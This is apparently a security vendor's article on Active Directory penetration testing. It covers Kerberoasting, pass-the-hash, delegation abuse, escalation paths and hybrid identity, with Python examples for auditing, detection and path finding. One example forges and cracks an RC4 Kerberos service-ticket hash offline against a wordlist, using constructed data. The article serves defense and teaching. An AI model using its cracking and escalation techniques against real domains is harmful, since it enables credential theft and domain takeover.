Active Directory Penetration Testing: Securing Your Identity Infrastructure

Why Active Directory Security Matters

Active Directory is the heart of identity and access management in most enterprise organizations. It manages user authentication and authorization for Windows computers, email systems, file shares, web applications, and countless other resources. Compromising Active Directory gives an attacker complete control over your organization's IT infrastructure and access to all systems and data managed by AD.

For more details, see our guides on internal network penetration testing, external network penetration testing, and ransomware penetration testing.

The severity of Active Directory compromise is evidenced by the frequency with which attackers target it. Active Directory attacks are a standard component of most sophisticated breach campaigns. Once an attacker compromises a user account in Active Directory, they can escalate to administrative access through privilege escalation attacks, move laterally across the network to access sensitive systems, and maintain persistence through backdoors and stolen credentials. Many of the worst breaches in recent years have been enabled by compromised Active Directory credentials and weak AD security configurations.

Yet many organizations have weak Active Directory security. Default configurations are often insecure. Older implementations accumulate misconfigurations and deprecated accounts over years of operation. Password policies are sometimes weaker than they should be. Security monitoring might be inadequate. Penetration testing specifically focused on Active Directory security identifies these weaknesses before attackers exploit them.

Understanding the Active Directory Attack Surface

Active Directory's attack surface extends beyond just compromising user credentials. Attackers can exploit multiple vulnerabilities in how Active Directory is configured and used to achieve domain compromise.

The domain controller itself is a critical attack target. Domain controllers authenticate all users and authorize all resource access. Compromising a domain controller gives attackers complete control over the domain. Penetration testing should evaluate whether domain controllers are properly protected with strong authentication, network segmentation, and access controls. Domain controllers should only be accessible to authorized administrators through secure channels, not accessible directly from user workstations.

User accounts are another attack vector. Weak passwords fall to password spraying online and to cracking offline once a hash or Kerberos ticket has been captured; passwords reused from breached sites fall to credential stuffing. Accounts whose passwords are set to never expire keep a stolen password valid until someone notices. Default or shared accounts create opportunities for unauthorized access and make attribution impossible. Service accounts that don't follow the principle of least privilege can be exploited to gain excessive access. Penetration testing should identify weak password policies, accounts with weak or default passwords, disabled security controls, and accounts with excessive permissions.

The Kerberos authentication protocol used by Active Directory has several known attack vectors. Kerberos tickets are encrypted, so sniffing the traffic does not expose passwords directly, but an attacker on the network can capture pre-authentication data and crack it offline, run password spray attacks (a few common passwords against many accounts, staying under the lockout threshold), or use Kerberoasting: requesting service tickets for accounts that have a registered service principal name (SPN). The encrypted part of such a ticket is keyed by the service account's password, so it can be taken offline and cracked at leisure.

Group Policy is another critical component of Active Directory. Group policies configure security settings, deploy software, map network drives, and manage countless other aspects of the Windows environment. Misconfigured group policies can disable security settings on client computers, weaken authentication requirements, or grant excessive permissions. Penetration testing should evaluate whether group policies are properly configured and whether attackers could exploit policy misconfigurations.

Delegation of administration through security groups can be exploited if groups are too broadly scoped. If all administrators are in a single global group with excessive permissions, compromise of any administrator account might compromise the entire domain. Least-privilege administration where different roles have access to only the resources they need reduces the impact of account compromise.

Common Active Directory Vulnerabilities

Certain vulnerabilities appear repeatedly in Active Directory environments. Penetration testing should specifically look for these common issues.

Weak password policies are a widespread vulnerability. Many organizations still allow passwords as short as four or six characters, never force a change even after a suspected compromise, or accept predictable formats such as Season+Year that satisfy a complexity check. Weak passwords are cracked offline once a hash or Kerberos ticket is obtained, and guessed online by password spraying. Current guidance (NIST SP 800-63B and Microsoft's own) favors length over forced rotation: require long passwords or passphrases (at least 12-16 characters for users, far longer for service accounts), allow complex character sets without mandating them, screen new passwords against breached-password lists, and force a change on evidence of compromise rather than on a calendar.

Disabled security features are surprisingly common. Some organizations disable account lockout to reduce help desk tickets, which removes the only online control against password spraying. Others disable password complexity requirements because users complain. Many leave NTLM authentication enabled for backward compatibility with legacy systems, even though NTLMv1 is cryptographically broken and NTLMv2 remains exposed to relay attacks and offline cracking of captured challenge-responses. Penetration testing should identify security features that have been disabled and help organizations understand the risk each one carries.

Overly permissive permissions on shared network resources create opportunities for unauthorized access and lateral movement. If all domain users have read access to file shares containing sensitive data, and attackers compromise any user account, they can access all that data. Permissions should follow the principle of least privilege where users have access only to resources they need for their job functions.

Service accounts that don't follow least-privilege principles represent a significant risk. A service account that's a member of the Domain Admins group gives attackers domain administrator access if they compromise the service account. Service accounts should have only the minimum permissions necessary to perform their function, and administrative service accounts should be rare exceptions.

Insecure delegation settings allow compromise of one resource to escalate to compromise of others. A server or service account configured for unconstrained delegation receives a copy of the Kerberos ticket-granting ticket (TGT) of every user who authenticates to it; if that host is compromised, the attacker can replay those TGTs to act as those users, including administrators, anywhere in the domain. Constrained delegation limits impersonation to a listed set of target services, and resource-based constrained delegation lets the owner of the target resource decide who may delegate to it. Penetration testing should identify unconstrained delegation and help organizations migrate to constrained or resource-based constrained delegation, and should check that sensitive accounts are marked "Account is sensitive and cannot be delegated" or placed in the Protected Users group so their tickets cannot be delegated at all.
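
The account-level issues above (service accounts with SPNs, passwords that never expire, privileged service accounts, unconstrained and constrained delegation) are all visible in a handful of LDAP attributes. The following is an added example for this article, not code from the original page: it audits constructed user objects shaped like an LDAP search result. In a real assessment you would feed it objects returned by ldap3 or Get-ADUser -Properties; the userAccountControl bit values are Microsoft's documented ones, and the accounts and group names are hypothetical.

```python
from dataclasses import dataclass, field

# userAccountControl bit flags (Microsoft-documented values)
UF_ACCOUNTDISABLE = 0x0002
UF_PASSWD_NOTREQD = 0x0020
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_TRUSTED_FOR_DELEGATION = 0x80000      # unconstrained delegation

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


@dataclass
class Entry:
    """The subset of LDAP attributes the audit needs."""
    sam: str                                            # sAMAccountName
    uac: int                                            # userAccountControl
    spns: list = field(default_factory=list)            # servicePrincipalName
    member_of: list = field(default_factory=list)       # group CNs, flattened
    delegate_to: list = field(default_factory=list)     # msDS-AllowedToDelegateTo


def is_machine(e):
    return e.sam.endswith("$")


def audit(e):
    """Return the finding tags that apply to one account, in a fixed order."""
    if e.uac & UF_ACCOUNTDISABLE:
        return []                                       # disabled: out of scope here
    tags = []
    if e.spns and not is_machine(e):
        tags.append("kerberoastable")                   # any domain user can pull its TGS
        if e.uac & UF_DONT_EXPIRE_PASSWD:
            tags.append("spn-password-never-expires")
        if PRIVILEGED_GROUPS & set(e.member_of):
            tags.append("privileged-service-account")   # cracked password == domain admin
    if e.uac & UF_PASSWD_NOTREQD:
        tags.append("password-not-required")
    if e.uac & UF_TRUSTED_FOR_DELEGATION:
        tags.append("unconstrained-delegation")         # expected on DCs only; review the rest
    elif e.delegate_to:
        tags.append("constrained-delegation")           # informational: review the target list
    return tags


def audit_all(entries):
    """Map sAMAccountName -> findings, omitting clean accounts."""
    return {e.sam: tags for e in entries if (tags := audit(e))}


# Constructed sample directory (hypothetical accounts in a fictional corp.local)
SAMPLE = [
    Entry("svc_sql", 0x10200, spns=["MSSQLSvc/db01.corp.local:1433"], member_of=["Domain Admins"]),
    Entry("svc_web", 0x200, spns=["HTTP/intranet.corp.local"]),
    Entry("svc_legacy", 0x10222, spns=["CIFS/legacy01.corp.local"]),      # disabled
    Entry("svc_old", 0x10220, spns=["HTTP/old.corp.local"]),
    Entry("svc_print", 0x200, delegate_to=["CIFS/fs01.corp.local"]),
    Entry("jsmith", 0x200),
    Entry("DC01$", 0x82000),                                              # DC: expected
    Entry("APP03$", 0x81000, spns=["HOST/app03.corp.local"]),              # not a DC
]

if __name__ == "__main__":
    for sam, tags in audit_all(SAMPLE).items():
        print(f"{sam:12} {', '.join(tags)}")
```

Machine accounts with SPNs are skipped because their passwords are 120 random characters and not crackable; the interesting Kerberoasting targets are user accounts with SPNs. The unconstrained-delegation tag fires on DC01$ as well, which is expected; the point of the check is every other principal it fires on.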

Kerberoasting Attacks

Kerberoasting is one of the most practical attacks against Active Directory. It exploits how Kerberos service tickets are issued to obtain material, keyed by a service account's password, that can be cracked offline.

In Kerberos, when a user asks for access to a service, the domain controller's ticket-granting service returns a service ticket whose encrypted part is protected with a key derived from the service account's password (for the RC4-HMAC encryption type, that key is simply the account's NT hash). The user presents the ticket to the service, which decrypts it with its own key. The weakness is not a bug but a design property: any authenticated domain user can request a service ticket for any account that has a service principal name (SPN) registered, with no authorization check at issuance time, and the ticket is offline-verifiable material keyed by that account's password.

A Kerberoasting attack works as follows: the attacker, authenticated as any domain user, queries the directory for accounts with SPNs and requests service tickets for them, typically asking for the RC4-HMAC encryption type because it is the cheapest to crack. The KDC returns tickets encrypted under keys derived from those service accounts' passwords. The attacker extracts the encrypted portion of each ticket (tools such as Rubeus or impacket's GetUserSPNs.py emit it directly in hashcat or John format) and cracks it offline by deriving a candidate key from each password guess and checking whether that key decrypts the ticket. If the service account has a weak password, the attacker recovers it and can authenticate as that account.
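
The mechanics above, as an added example for this article (not code from the original page and not a real capture): the service ticket keyed by a service account's password, and the offline guess-and-check that recovers the password. It implements the RC4-HMAC encryption type (Kerberos etype 23, RFC 4757) in pure Python, forges the encrypted part of a ticket for a hypothetical svc_sql account with a weak password, renders it in hashcat's $krb5tgs$23$ line format, and cracks it with a constructed wordlist. A real ticket body is an ASN.1 EncTicketPart; the placeholder bytes stand in for it.

```python
import hashlib, hmac, os, struct

M32 = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2          # enc-part of the ticket inside a TGS-REP


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib often lacks MD4 on OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = ((F, range(16), (3, 7, 11, 19), 0),
              (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
              (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, idx, sh, k in rounds:
            for i, j in enumerate(idx):
                a = rol((a + fn(b, c, d) + X[j] + k) & M32, sh[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key, msg):
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, plaintext, confounder=None):
    """RFC 4757 section 5: output is checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    confounder = os.urandom(8) if confounder is None else confounder
    checksum = hmac_md5(k1, confounder + plaintext)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_check(key, usage, blob):
    """Decrypt with a candidate key; return the plaintext only if the checksum verifies."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum, edata = blob[:16], blob[16:]
    plain = rc4(hmac_md5(k1, checksum), edata)
    return plain[8:] if hmac.compare_digest(hmac_md5(k1, plain), checksum) else None


def forge_tgs_hash(sam, realm, spn, password, ticket_body):
    """What a captured ticket for this SPN looks like in hashcat mode 13100 format."""
    blob = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_TGS_REP_TICKET, ticket_body)
    return f"$krb5tgs$23$*{sam}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_tgs_hash(line, wordlist):
    """Offline attack: derive a key from each guess and see whether it opens the ticket."""
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for guess in wordlist:
        if rc4_hmac_check(nt_hash(guess), KEY_USAGE_TGS_REP_TICKET, blob) is not None:
            return guess
    return None


# Constructed inputs: a hypothetical SQL service account and a small wordlist.
TICKET_BODY = b"\x63\x82\x03\xf1" + b"constructed EncTicketPart placeholder" * 4
WORDLIST = ["Welcome1", "Summer2023!", "Sql2019", "P@ssw0rd"]

if __name__ == "__main__":
    line = forge_tgs_hash("svc_sql", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433", "Sql2019", TICKET_BODY)
    print(line[:72] + "...")
    print("cracked:", crack_tgs_hash(line, WORDLIST))
```

Two things to take from the code. The KDC never sees the guessing: every check in crack_tgs_hash is local, so lockout and rate limiting do not apply, and a GPU does the same MD4-plus-HMAC work billions of times per second. And the key for etype 23 is the bare NT hash with no salt and no iteration count, which is why testers ask for RC4 tickets and why forcing AES on service accounts (whose keys are PBKDF2-derived and salted) raises the cracking cost by orders of magnitude.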

Kerberoasting is dangerous because it is simple to execute, needs nothing beyond a low-privileged domain account, and involves no exploit: it only asks the KDC for tickets the KDC is designed to issue. It is not invisible, however. Each request produces a Kerberos service ticket event (Security Event ID 4769) on the domain controller, and one user requesting RC4-encrypted tickets for many user accounts within a few seconds is a strong signal. Most organizations are simply not looking for it, which is the real reason it rarely triggers an alert.
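
The detection logic just described, as an added example (not from the original page): flag a principal that obtains RC4-encrypted service tickets for several distinct non-machine accounts inside a short window. The records are constructed 4769 events in a flat key=value export format, not Windows' own XML; parse_event() is the only part that changes when you point it at your SIEM's field names.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17        # TicketEncryptionType for etype 23; AES128 = 0x11, AES256 = 0x12


def parse_event(line):
    """One flat 'timestamp key=value ...' record -> dict with parsed ts and etype."""
    ts, *kv = line.split()
    ev = dict(p.split("=", 1) for p in kv)
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    ev["etype"] = int(ev.get("TicketEncryptionType", "0x0"), 16)
    return ev


def is_roast_candidate(ev):
    """Successfully issued RC4 ticket for a user account (not a machine, not krbtgt)."""
    svc = ev["ServiceName"]
    return (ev["EventID"] == "4769" and ev.get("Status", "0x0") == "0x0"
            and ev["etype"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect(lines, min_services=3, window=timedelta(minutes=5)):
    """Return (requester, ip, sorted service accounts) for each requester that hits the threshold."""
    by_requester = defaultdict(list)
    for line in filter(None, (l.strip() for l in lines)):
        ev = parse_event(line)
        if is_roast_candidate(ev):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].append((ev["ts"], ev["ServiceName"]))
    alerts = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):                 # sliding window from each request
            names = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(names) >= min_services:
                alerts.append((user, ip, sorted(names)))
                break
    return alerts


# Constructed sample export: a normal AES user, a roasting burst, a slow legacy app, a failure.
SAMPLE_LOGS = """\
2024-05-02T09:14:01Z EventID=4769 TargetUserName=jsmith@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.1.2.3 Status=0x0
2024-05-02T09:14:02Z EventID=4769 TargetUserName=jsmith@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 IpAddress=10.1.2.3 Status=0x0
2024-05-02T09:30:10Z EventID=4769 TargetUserName=rkhan@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.1.7.44 Status=0x0
2024-05-02T09:30:10Z EventID=4769 TargetUserName=rkhan@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.1.7.44 Status=0x0
2024-05-02T09:30:11Z EventID=4769 TargetUserName=rkhan@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.1.7.44 Status=0x0
2024-05-02T09:30:11Z EventID=4769 TargetUserName=rkhan@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.1.7.44 Status=0x0
2024-05-02T09:30:12Z EventID=4769 TargetUserName=rkhan@CORP.LOCAL ServiceName=FS01$ TicketEncryptionType=0x17 IpAddress=10.1.7.44 Status=0x0
2024-05-02T11:02:00Z EventID=4769 TargetUserName=legacyapp@CORP.LOCAL ServiceName=svc_legacy TicketEncryptionType=0x17 IpAddress=10.1.9.9 Status=0x0
2024-05-02T11:45:00Z EventID=4769 TargetUserName=legacyapp@CORP.LOCAL ServiceName=svc_print TicketEncryptionType=0x17 IpAddress=10.1.9.9 Status=0x0
2024-05-02T12:10:00Z EventID=4769 TargetUserName=legacyapp@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.1.9.9 Status=0x0
2024-05-02T12:11:00Z EventID=4769 TargetUserName=mlee@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.1.3.8 Status=0x1F
"""

if __name__ == "__main__":
    for user, ip, services in detect(SAMPLE_LOGS.splitlines()):
        print(f"possible Kerberoasting by {user} from {ip}: {', '.join(services)}")
```

The legacy application in the sample still gets RC4 tickets, but one every half hour for accounts it legitimately uses; tune the threshold and window against your own baseline rather than alerting on every RC4 ticket. Once service accounts are restricted to AES, any 0x17 ticket for them becomes an alert in its own right.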

Penetration testing should specifically test for Kerberoasting. Testers should enumerate accounts with SPNs, request their tickets, and attempt to crack them offline; if service account passwords are weak, testing should demonstrate it rather than assert it. Remediation includes long, random passwords (25 or more characters) for any user account that must keep an SPN, restricting those accounts to AES by setting msDS-SupportedEncryptionTypes so the KDC never issues RC4 tickets for them, and, better still, migrating to standalone Managed Service Accounts (sMSA) or Group Managed Service Accounts (gMSA), whose 120-character passwords are generated by the domain and rotated automatically (every 30 days by default).

Pass-the-Hash and Credential Theft Attacks

Windows caches credential material in memory (LSASS holds the NT hash and Kerberos keys of every logged-on user) and stores it on disk (the local SAM database, and NTDS.dit on domain controllers). An attacker who can read that memory or those files, which requires local administrator or SYSTEM rights, obtains password hashes and can use them to authenticate as those users without ever knowing the passwords. This is pass-the-hash.

Pass-the-hash works because NTLM authentication never transmits or needs the password: the NT hash is the key used to compute the challenge-response, so possessing the hash is equivalent to possessing the password for every system that accepts NTLM. A hash extracted from memory on one compromised workstation can be used to authenticate to file servers, email servers, management interfaces, or any other system that the same account is allowed to reach.

Protecting against pass-the-hash takes several controls, and a strong password is not one of them: the hash is used directly, so nothing is cracked. Credential Guard (Windows 10 and 11 Enterprise and Education, Windows Server 2016 and later) isolates LSASS secrets in a virtualization-based enclave so they cannot be dumped from a compromised machine. Restricting where privileged accounts can log on (domain administrators never on user workstations, a tiered administration model with dedicated admin workstations) keeps high-value hashes out of memory an attacker can reach. The Protected Users group and "Deny access to this computer from the network" rights limit where an account's hash is usable at all. Unique local administrator passwords managed by LAPS stop one local hash from opening every workstation. Network segmentation and SMB signing limit where a compromised host can reach and what it can relay.

Penetration testing should attempt to steal credentials from compromised systems and use those stolen credentials to access other systems. Testing should confirm whether stolen credentials can be used for lateral movement, and if so, help identify where network segmentation and access controls should be strengthened.

Privilege Escalation in Active Directory

Once attackers compromise a standard user account, they typically don't stop. They escalate privileges to gain administrative access, which allows them to compromise additional systems and maintain persistence.

Active Directory has many privilege escalation paths. A principal holding SeEnableDelegationPrivilege can configure delegation on accounts and use it to impersonate users. A principal with WriteDacl on an object can rewrite its ACL to grant itself full control. A principal with ForceChangePassword or GenericAll over an account in a privileged group can reset its password and take the account over. None of these is a vulnerability on its own; the danger is in chains of individually reasonable permissions that lead from a compromised user account to domain administrator access.

Tools like BloodHound collect these relationships and map them as a graph, showing penetration testers and attackers the same chains. For example, a compromised user might have write access to a GPO linked to the Domain Controllers OU; a scheduled task or startup script added to that GPO runs as SYSTEM on every domain controller. Or the user might be able to reset the password of a service account that, in turn, has administrator rights on a server where a domain administrator is logged on, exposing that administrator's credentials in memory.
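
The graph search behind such a tool is short enough to show in full. This is an added example for this article, not BloodHound's own code or data format: the nodes and edges are constructed for a fictional CORP.LOCAL domain (in practice they come from a SharpHound collection), the relationship names are BloodHound's, and the search returns the shortest chain from a starting principal to a target group. The second function simulates a remediation by dropping edges and re-running the search, which is exactly the "did the fix actually close the path" check a retest performs.

```python
from collections import defaultdict, deque

# Constructed sample graph: (source, relationship, target), BloodHound edge names.
EDGES = [
    ("JSMITH@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "GenericAll", "SVC_SQL@CORP.LOCAL"),
    ("SVC_SQL@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "ForceChangePassword", "SVC_DEPLOY@CORP.LOCAL"),
    ("SVC_DEPLOY@CORP.LOCAL", "GenericWrite", "WORKSTATION BASELINE@CORP.LOCAL"),   # a GPO
    ("WORKSTATION BASELINE@CORP.LOCAL", "GpLink", "WORKSTATIONS@CORP.LOCAL"),       # an OU
    ("WORKSTATIONS@CORP.LOCAL", "Contains", "WS042.CORP.LOCAL"),
    ("WS042.CORP.LOCAL", "HasSession", "ADM-ALICE@CORP.LOCAL"),                    # DA logged on
    ("ADM-ALICE@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "WriteDacl", "IT-ADMINS@CORP.LOCAL"),
    ("IT-ADMINS@CORP.LOCAL", "AdminTo", "FS01.CORP.LOCAL"),                        # dead end
]


def build_graph(edges):
    g = defaultdict(list)
    for src, rel, dst in edges:
        g[src].append((rel, dst))
    return g


def shortest_path(edges, start, target):
    """Breadth-first search; returns the edge list of the shortest chain, or None."""
    g = build_graph(edges)
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while prev[node] is not None:
                parent, rel = prev[node]
                path.append((parent, rel, node))
                node = parent
            return path[::-1]
        for rel, nxt in g[node]:
            if nxt not in prev:
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None


def without(edges, *removed):
    """Simulate a remediation: the graph with the given edges taken out."""
    return [e for e in edges if e not in removed]


def describe(path):
    return path[0][0] + "".join(f" -[{rel}]-> {dst}" for _, rel, dst in path)


if __name__ == "__main__":
    start, da = "JSMITH@CORP.LOCAL", "DOMAIN ADMINS@CORP.LOCAL"
    print("initial:", describe(shortest_path(EDGES, start, da)))
    fixed = without(EDGES, ("HELPDESK@CORP.LOCAL", "GenericAll", "SVC_SQL@CORP.LOCAL"))
    print("after removing GenericAll:", describe(shortest_path(fixed, start, da)))
    fixed = without(fixed, ("WS042.CORP.LOCAL", "HasSession", "ADM-ALICE@CORP.LOCAL"))
    print("after also tiering the admin logon:", shortest_path(fixed, start, da))
```

Removing the obvious GenericAll edge does not close the path; it only makes the next-shortest chain (through a GPO and a domain admin's workstation session) the shortest one. That is why remediation is iterated against the graph rather than against a list of individual findings.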

Penetration testing should use tools like BloodHound to map out privilege escalation paths and identify which paths can actually be exploited. Testing should confirm whether attackers can progress from compromising a standard user account to obtaining domain administrator access. If privilege escalation paths exist, remediation focuses on removing unnecessary permissions or limiting permissions to least-privilege, eliminating the escalation chains.

Group Policy Misconfigurations

Group Policy is a powerful tool for managing Windows environments at scale. Thousands of settings can be configured and applied to computers, users, and resources. However, Group Policy can also introduce security vulnerabilities if misconfigurations disable security settings or grant excessive permissions.

Common Group Policy misconfigurations include disabling antivirus (including Microsoft Defender), disabling automatic updates, disabling Windows Firewall, or weakening authentication requirements such as allowing NTLMv1 or storing LAN Manager hashes. Some organizations link permissive policies at the domain root instead of scoping them to the specific OUs where they are needed. The result is that security controls are disabled on systems where they shouldn't be, creating vulnerabilities.

Penetration testing should review all group policies applied in the domain, looking for policies that disable security settings or create security vulnerabilities. Testing should also verify whether group policies are properly scoped to appropriate organizational units. A security policy applied globally might not be intended for all systems. Policies should be scoped to specific sets of computers based on legitimate operational needs.

Testing should also verify that group policies are actually enforced. A user with local administrator rights on a machine can stop the policy from applying or roll back the settings it made, so enforcement in practice means keeping local administrator rights off ordinary users, setting the Enforced flag on security baselines so lower-level links cannot override them, and alerting when security settings drift from what the policy specifies.

Domain Controller Security and Hardening

Domain controllers are the most critical systems in an Active Directory environment. Compromising a domain controller gives attackers complete control over the domain. Yet domain controllers are sometimes not as well-protected as they should be.

Domain controllers should be highly restricted systems accessible only to authorized administrators through secure channels. Network segmentation should prevent user workstations from directly accessing domain controllers. Access to domain controllers should require multi-factor authentication. Administrative access should be granted using just-in-time access provisioning rather than standing access. These controls limit the impact if administrator credentials are compromised or if an attacker gains access to the network.

Domain controllers should run only the services necessary to provide identity services. Additional services running on domain controllers expand the attack surface. Domain controllers should not run email, web, or application servers. They should not host shared file storage or other general-purpose services. The more services running, the more potential vulnerabilities and attack vectors.

Penetration testing should evaluate domain controller access controls. Can unauthorized users access domain controllers? Can users access domain controllers without appropriate authentication? Can attackers laterally move to domain controllers from compromised user workstations? Proper security means domain controllers are effectively isolated from general user access and only accessible to authorized administrators.

Azure AD and Hybrid Identity Testing

Many organizations use Microsoft Entra ID (formerly Azure AD) for cloud authentication, often in hybrid environments where both on-premises Active Directory and Entra ID are in use. Hybrid environments introduce additional complexity and attack surface.

Microsoft Entra Connect (formerly Azure AD Connect) synchronizes accounts, and optionally password hashes, between on-premises AD and Entra ID. The server running it is a domain controller-class asset: its AD DS connector account holds directory replication rights, so compromising the server yields every password hash in the domain, and its cloud connector account can write to the tenant. Password hash synchronization, password writeback, and seamless single sign-on each add attack paths. Penetration testing should evaluate Entra Connect security: who can log on to the server, how the connector accounts are protected, and whether synchronization scoping is correct.

Hybrid environments can also introduce complexity in managing permissions. A user might have permissions in on-premises AD but not in Azure AD, or vice versa. Attackers might exploit these differences to gain access. Testing should evaluate permission consistency across both directories and identify opportunities for unauthorized access.

Cloud resources accessed through Entra ID should also be tested. Conditional Access policies control where, how, and from which devices users can authenticate. Common gaps include accounts excluded from the MFA policy (break-glass and service accounts), legacy authentication protocols that are not blocked and so bypass MFA entirely, and policies left in report-only mode. Testing should verify that the policies are enforced for the accounts and protocols that matter.

Building a Comprehensive Active Directory Penetration Test

A comprehensive Active Directory penetration test requires specialized expertise. Testing should include external attacks against the internet-facing services that authenticate to AD or Entra ID (VPN portals, Outlook Web Access and ActiveSync, AD FS, the Entra ID sign-in endpoint), internal attacks from a compromised user workstation, and testing of administrative functions.

External testing should simulate attackers outside your network attempting to compromise credentials. This includes password spraying against those exposed services (paced against the lockout policy so the test does not become a denial of service), credential stuffing with any leaked credentials, and user enumeration that reveals valid accounts and the naming convention. Testing should establish whether an attacker can obtain valid credentials before gaining network access, or whether initial compromise requires a foothold inside the network.

Internal testing should simulate an attacker who has compromised a user workstation or a standard user account. From that starting point, testing should identify privilege escalation paths to domain administrator access. Testing should map out lateral movement options and identify which systems can be accessed with compromised credentials.

Administrative testing should verify that administrative functions are properly secured. Can an attacker compromise an administrative account and maintain persistence? Can they disable audit logging to hide their activities? Can they create backdoor accounts? Testing should confirm that administrative actions are properly logged and monitored.

Choosing Your Active Directory Penetration Testing Partner

Active Directory penetration testing requires specialized expertise. When selecting a testing partner, look for firms with demonstrated experience testing Active Directory environments, familiarity with attack tooling such as Mimikatz, Rubeus, impacket and BloodHound, understanding of Kerberos and NTLM authentication and Windows security, and the ability to test both on-premises AD and hybrid Entra ID environments if relevant to your organization.

Your testing partner should understand your organization's specific configuration, deployment model, and the business-critical systems that depend on Active Directory. They should provide clear documentation of findings, explain how vulnerabilities could be exploited, and offer practical recommendations for remediation.

After testing, prioritize remediation of critical findings. Domain administrator compromises should be addressed immediately. Kerberoasting findings should be remediated by moving service accounts to gMSA where possible and, where not, by setting long random passwords and restricting the accounts to AES. Privilege escalation paths should be eliminated by removing unnecessary permissions. A remediation retest should confirm that the fixes actually close the paths rather than shifting them.

Ongoing Active Directory Security

Penetration testing identifies vulnerabilities at a point in time. However, Active Directory changes constantly. Users are added and removed. Accounts are granted new permissions. Systems are added to the domain. New group policies are applied. These changes can introduce new vulnerabilities.

Effective Active Directory security requires ongoing monitoring and testing, not just periodic penetration testing. Implement continuous monitoring of Active Directory changes. Alert on suspicious activities like multiple failed authentication attempts, privilege escalation attempts, or unexpected administrative activities. Regularly review permissions to ensure they still follow the principle of least privilege. Periodically rescan for vulnerabilities using Active Directory security assessment tools.

Regular penetration testing, combined with continuous monitoring, creates multiple layers of protection. Penetration testing identifies vulnerabilities that attackers could exploit. Continuous monitoring detects when attacks are occurring. Together, these controls significantly reduce the likelihood of successful Active Directory compromise and data breach.

Ready to Secure Your Active Directory?

Get a comprehensive Active Directory penetration test. Identify Kerberoasting vulnerabilities, privilege escalation paths, and configuration weaknesses before attackers do.

Get a Pentest Quote